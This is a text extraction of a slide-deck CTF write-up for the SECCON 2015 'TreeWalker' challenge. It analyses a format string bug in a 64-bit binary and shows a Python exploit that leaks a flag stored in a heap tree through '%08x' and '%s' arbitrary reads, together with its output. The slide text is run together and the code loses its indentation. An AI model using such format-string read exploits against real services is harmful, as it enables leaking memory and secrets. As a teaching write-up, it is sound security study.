Download - FSB: TreeWalker - SECCON 2015 Online CTF
![Page 1: FSB: TreeWalker - SECCON 2015 Online CTF](https://reader030.vdocuments.mx/reader030/viewer/2022020410/588273841a28ab470c8b7499/html5/thumbnails/1.jpg)
FSB: TreeWalkerExploit 200 points - SECCON 2015 Online CTF you0708@YOKARO-MON
![Page 2: FSB: TreeWalker - SECCON 2015 Online CTF](https://reader030.vdocuments.mx/reader030/viewer/2022020410/588273841a28ab470c8b7499/html5/thumbnails/2.jpg)
treewalker.pwn.seccon.jp 20000
![Page 3: FSB: TreeWalker - SECCON 2015 Online CTF](https://reader030.vdocuments.mx/reader030/viewer/2022020410/588273841a28ab470c8b7499/html5/thumbnails/3.jpg)
Surface Analysis
• ELF 64-bit LSB executable, x86-64, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.32, not stripped
• Arch: amd64-64-little
• RELRO: No RELRO
• Stack: No canary found
• NX: NX enabled
• PIE: No PIE
• FORTIFY: Enabled
![Page 4: FSB: TreeWalker - SECCON 2015 Online CTF](https://reader030.vdocuments.mx/reader030/viewer/2022020410/588273841a28ab470c8b7499/html5/thumbnails/4.jpg)
Dynamic Analysis
# ./treewalker0000000000c69010ABCDEFGHIJKLMNvulnserver.c(77): Invalid input# IJKLMNbash: IJKLMN: command not found#
Address?
Read only 8 bytesRead only 8 bytes
![Page 5: FSB: TreeWalker - SECCON 2015 Online CTF](https://reader030.vdocuments.mx/reader030/viewer/2022020410/588273841a28ab470c8b7499/html5/thumbnails/5.jpg)
Static Analysis
• Main function
The address given by the program is related
to flag?
![Page 6: FSB: TreeWalker - SECCON 2015 Online CTF](https://reader030.vdocuments.mx/reader030/viewer/2022020410/588273841a28ab470c8b7499/html5/thumbnails/6.jpg)
• construct_tree
Static Analysis
![Page 7: FSB: TreeWalker - SECCON 2015 Online CTF](https://reader030.vdocuments.mx/reader030/viewer/2022020410/588273841a28ab470c8b7499/html5/thumbnails/7.jpg)
Static Analysis
• construct_tree
Leaf
Flag = 0x49
0
Child
0 1
Leaf
Flag = 0x49
Child
0
Leaf
Flag = 0x4C
0
0
![Page 8: FSB: TreeWalker - SECCON 2015 Online CTF](https://reader030.vdocuments.mx/reader030/viewer/2022020410/588273841a28ab470c8b7499/html5/thumbnails/8.jpg)
Static Analysis
• construct_tree0 1
LeafLeaf
LeafLeafLeaf
LeafLeaf
Leaf
01
01
00
01
F
Leaf End
![Page 9: FSB: TreeWalker - SECCON 2015 Online CTF](https://reader030.vdocuments.mx/reader030/viewer/2022020410/588273841a28ab470c8b7499/html5/thumbnails/9.jpg)
Static Analysis
• Main function
1. First 8 bytes of input data are “size”
2. Show input data by ___printf_chk
![Page 10: FSB: TreeWalker - SECCON 2015 Online CTF](https://reader030.vdocuments.mx/reader030/viewer/2022020410/588273841a28ab470c8b7499/html5/thumbnails/10.jpg)
Static Analysis
0x0000000000000004 hoge
hoge
flag address
Loop
![Page 11: FSB: TreeWalker - SECCON 2015 Online CTF](https://reader030.vdocuments.mx/reader030/viewer/2022020410/588273841a28ab470c8b7499/html5/thumbnails/11.jpg)
Vulnerability
• FSB = Format String Bug0000000000602010
00000078f7b175c000000b40ffffcff00000000000000078cccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc78383025
After sending “%08x” * 30
“%08x”
![Page 12: FSB: TreeWalker - SECCON 2015 Online CTF](https://reader030.vdocuments.mx/reader030/viewer/2022020410/588273841a28ab470c8b7499/html5/thumbnails/12.jpg)
Exploit
![Page 13: FSB: TreeWalker - SECCON 2015 Online CTF](https://reader030.vdocuments.mx/reader030/viewer/2022020410/588273841a28ab470c8b7499/html5/thumbnails/13.jpg)
Understanding Heap Layout
• Heap chunksChunk size + PREV_INUSE Flag = 0x49
0 or Address of child
![Page 14: FSB: TreeWalker - SECCON 2015 Online CTF](https://reader030.vdocuments.mx/reader030/viewer/2022020410/588273841a28ab470c8b7499/html5/thumbnails/14.jpg)
Information Leakage
• Using format string bug
Leaf
Flag = 0x49
0
Child
Leaf
Flag = 0x49
Child
0
Leaf
Flag = 0x49
Child
0
zero or not
0x49 or 0x4C
…
Given address
Given address +0x18 (size of leaf)
+0x08 (size of chunk header)
Given address + 0x40
zero or not
0x49 or 0x4C
zero or not
0x49 or 0x4C
![Page 15: FSB: TreeWalker - SECCON 2015 Online CTF](https://reader030.vdocuments.mx/reader030/viewer/2022020410/588273841a28ab470c8b7499/html5/thumbnails/15.jpg)
exploit.pyflag = ""flag_next = ""while flag_next != "L": c = 0 for i in range(8): c = c << 1 buf = '%08x' * 32 buf += ' !%s! ' buf += ' !%s! ' buf += pQ(addr) buf += pQ(addr + 8) f.write(pQ(len(buf)) + buf) read_until(f, ' !') flag_next = read_until(f, '! ')[:-3] read_until(f, ' !') child = read_until(f, '! ')[:-3] if flag_next == 'L': break if child: bit = 1 else: bit = 0 print bit, c += bit addr += 0x20 else: print "" flag += chr(c)print("[*] flag: %s" % flag)
![Page 16: FSB: TreeWalker - SECCON 2015 Online CTF](https://reader030.vdocuments.mx/reader030/viewer/2022020410/588273841a28ab470c8b7499/html5/thumbnails/16.jpg)
python exploit.py[*] addr: 00000000006020100 1 0 1 0 0 1 1 0 1 0 0 0 1 0 1 0 1 0 0 0 0 1 1 0 1 0 0 0 0 1 1 0 1 0 0 1 1 1 1 0 1 0 0 1 1 1 0 0 1 1 1 1 0 1 1 0 0 1 1 0 1 0 0 0 1 1 1 0 0 1 0 0 1 1 0 0 0 1 0 0 0 1 1 0 0 0 1 0 0 1 1 0 1 1 1 0 1 0 1 0 0 1 0 0 1 0 0 0 0 0 0 0 1 1 1 0 0 1 0 0 1 0 1 1 0 0 1 0 1 0 1 0 0 1 0 0 1 1 0 0 1 0 1 0 1 0 0 0 0 0 1 0 1 1 0 0 1 0 0 0 1 1 1 1 1 0 1 [*] flag: SECCON{4rb17R@rYReAd}
![Page 17: FSB: TreeWalker - SECCON 2015 Online CTF](https://reader030.vdocuments.mx/reader030/viewer/2022020410/588273841a28ab470c8b7499/html5/thumbnails/17.jpg)
Thank you!